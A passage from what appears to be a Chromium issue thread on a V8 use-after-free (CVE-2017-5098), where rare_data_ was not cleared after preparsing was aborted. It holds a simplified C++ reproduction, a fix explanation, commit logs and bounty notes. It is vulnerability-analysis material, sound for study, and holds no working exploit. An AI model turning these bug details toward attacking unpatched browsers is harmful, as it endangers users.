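      rare_data_ = new (zone_->New(sizeof(RareData))) RareData();
    return rare_data_;
  }
  // Preparsing was abandoned: the temporary zone is about to be destroyed and
  // the function is re-parsed in main_zone. Every pointer into the temporary
  // zone must be dropped here; forgetting rare_data_ is the bug this page is
  // about, and null_rare_data == true is the fixed behaviour.
  void ResetAfterPreparsing(Zone* main_zone, bool null_rare_data) {
    zone_ = main_zone;
    if (null_rare_data) rare_data_ = nullptr;
  }
  // Later pass that walks rare data (the equivalent of the crash site).
  Status AllocateLocals() {
    if (rare_data_ == nullptr) return Status::kOk;
    if (!SegmentRegistry::IsLive(rare_data_)) return Status::kDanglingRareData;
    rare_data_->declared_global_count = 0;
    return Status::kOk;
  }
 private:
  Zone* zone_;
  RareData* rare_data_;
};

// Run the abort-preparsing sequence and report what the later pass sees.
Scope::Status SimulateAbortedPreparse(bool apply_fix) {
  Zone main_zone;
  Scope scope(&main_zone);
  {
    Zone temp_zone;           // stand-in for the discardable preparse zone
    scope.SetZone(&temp_zone);
    scope.EnsureRareData();   // rare data now lives in temp_zone
    scope.ResetAfterPreparsing(&main_zone, apply_fix);  // preparse aborted
  }                           // temp_zone destroyed here
  return scope.AllocateLocals();
}
```

With `apply_fix == false` the later pass finds `rare_data_` still pointing into the destroyed zone, which is exactly the read ASan flagged in `AllocateLocals` above; with `apply_fix == true` the pointer is null and the next `EnsureRareData()` call allocates afresh in the main zone. The practical lesson for anyone maintaining an arena-backed data structure is to treat "reset to a different zone" as a checklist over every zone-owned member, and to keep an ASan build in the regression suite so a missed member shows up as a crash rather than silent corruption.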
Cc: ca...@igalia.com
+caitp so she can see the bug while reviewing
Project Member Comment 13 by bugdroid1@chromium.org, Jul 12
The following revision refers to this bug:
  https://chromium.googlesource.com/v8/v8.git/+/b56c0f7a7ecb5254a4f785b929f9cee346a40566

commit b56c0f7a7ecb5254a4f785b929f9cee346a40566
Author: Adam Klein <adamk@chromium.org>
Date: Wed Jul 12 20:26:10 2017

[scope] Null out rare_data_ when aborting preparsing

When we abort preparsing, we have to reset the Scope state, to ensure
re-parsing will leave us in the proper Zone. Resetting of rare_data_
was missing, causing this to fail in some cases.

Bug: chromium:740803
Change-Id: I7ce70f9c4670eaf1b76745ae8231eb95625b0f4b
Reviewed-on: https://chromium-review.googlesource.com/568784
Reviewed-by: Caitlin Potter <caitp@igalia.com>
Commit-Queue: Adam Klein <adamk@chromium.org>
Cr-Commit-Position: refs/heads/master@{#46607}
[modify] https://crrev.com/b56c0f7a7ecb5254a4f785b929f9cee346a40566/src/ast/scopes.cc
[add] https://crrev.com/b56c0f7a7ecb5254a4f785b929f9cee346a40566/test/mjsunit/regress/regress-crbug-740803.js

Labels: M-60 M-61 Merge-Request-60
Status: Fixed
This is a super-safe fix for a use-after-free, so requesting backmerge to M-60.
Project Member Comment 15 by sheriffbot@chromium.org, Jul 12
Labels: -Merge-Request-60 Hotlist-Merge-Review Merge-Review-60
This bug requires manual review: We are only 12 days from stable.
Please contact the milestone owner if you have questions.
Owners: amineer@(Android), cmasso@(iOS), josafat@(ChromeOS), bustamante@(Desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 16 by sheriffbot@chromium.org, Jul 13
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: -Merge-Review-60 Merge-Approved-60
Project Member Comment 18 by bugdroid1@chromium.org, Jul 17
Labels: merge-merged-6.0
The following revision refers to this bug:
  https://chromium.googlesource.com/v8/v8.git/+/7d00aa24e80fd144cee8c8c2d62305b1aaa38a50

commit 7d00aa24e80fd144cee8c8c2d62305b1aaa38a50
Author: Adam Klein <adamk@chromium.org>
Date: Mon Jul 17 17:17:15 2017

Merged: [scope] Null out rare_data_ when aborting preparsing

Revision: b56c0f7a7ecb5254a4f785b929f9cee346a40566

BUG=chromium:740803
LOG=N
NOTRY=true
NOPRESUBMIT=true
NOTREECHECKS=true
R=jkummerow@chromium.org

Change-Id: Ib9577a20723fd1aa878eeb2284ac60ca997225d3
Reviewed-on: https://chromium-review.googlesource.com/574755
Reviewed-by: Jakob Kummerow <jkummerow@chromium.org>
Cr-Commit-Position: refs/branch-heads/6.0@{#77}
Cr-Branched-From: 97dbf624a5eeffb3a8df36d24cdb2a883137385f-refs/heads/6.0.286@{#1}
Cr-Branched-From: 12e6f1cb5cd9616da7b9d4a7655c088778a6d415-refs/heads/master@{#45439}
[modify] https://crrev.com/7d00aa24e80fd144cee8c8c2d62305b1aaa38a50/src/ast/scopes.cc
[add] https://crrev.com/7d00aa24e80fd144cee8c8c2d62305b1aaa38a50/test/mjsunit/regress/regress-crbug-740803.js

Labels: -Merge-Approved-60 Merge-Merged-60
Labels: Release-0-M60
Labels: reward-topanel
Labels: CVE-2017-5098
Labels: -reward-topanel reward-unpaid reward-3000
*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************
Nice one june901116@ - the VRP panel decided to award $3,000 for this report! A member of our finance team will be in touch shortly to arrange for payment.
Labels: -reward-unpaid reward-inprocess
Project Member Comment 26 by sheriffbot@chromium.org, Oct 19
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot